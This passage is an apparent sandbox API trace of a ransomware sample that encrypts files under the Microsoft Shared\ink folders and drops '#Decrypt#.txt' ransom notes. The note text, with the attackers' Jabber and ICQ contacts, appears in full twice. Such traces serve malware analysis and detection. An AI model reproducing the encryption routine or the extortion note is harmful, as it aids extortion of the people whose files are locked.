[0234.221] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.221] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.222] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0234.222] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0234.222] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned 60 [0234.222] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0234.222] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0234.222] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.222] GetProcessHeap () returned 0x780000 [0234.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.222] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*") returned 62 [0234.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.223] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\.") returned 62 [0234.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.223] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\..") returned 63 [0234.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.224] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.224] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned 76 [0234.224] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.224] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.224] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.224] lstrlenW (lpString=".testttjffg") returned 11 [0234.224] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.224] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.224] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.224] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.224] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.224] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\#Decrypt#.txt") returned 74 [0234.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.225] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.225] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.226] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.226] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.226] CloseHandle (hObject=0x158) returned 1 [0234.226] GetProcessHeap () returned 0x780000 [0234.226] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.226] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0234.226] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0234.227] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned 60 [0234.227] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0234.227] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0234.227] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.227] GetProcessHeap () returned 0x780000 [0234.227] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.227] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*") returned 62 [0234.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.227] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\.") returned 62 [0234.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.227] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.228] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\..") returned 63 [0234.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.228] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.228] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.228] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned 76 [0234.228] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.228] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.228] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.228] lstrlenW (lpString=".testttjffg") returned 11 [0234.228] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.228] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.228] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.228] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.228] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.228] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.229] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\#Decrypt#.txt") returned 74 [0234.229] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.230] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.230] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.231] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.231] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.231] CloseHandle (hObject=0x158) returned 1 [0234.232] GetProcessHeap () returned 0x780000 [0234.232] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.232] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0234.232] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0234.232] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned 60 [0234.232] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0234.232] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0234.232] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.232] GetProcessHeap () returned 0x780000 [0234.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.232] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*") returned 62 [0234.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.233] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.234] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\.") returned 62 [0234.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.234] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.234] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.234] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\..") returned 63 [0234.234] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.234] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.234] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.234] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.234] wnsprintfW (in: pszDest=0x7db828, 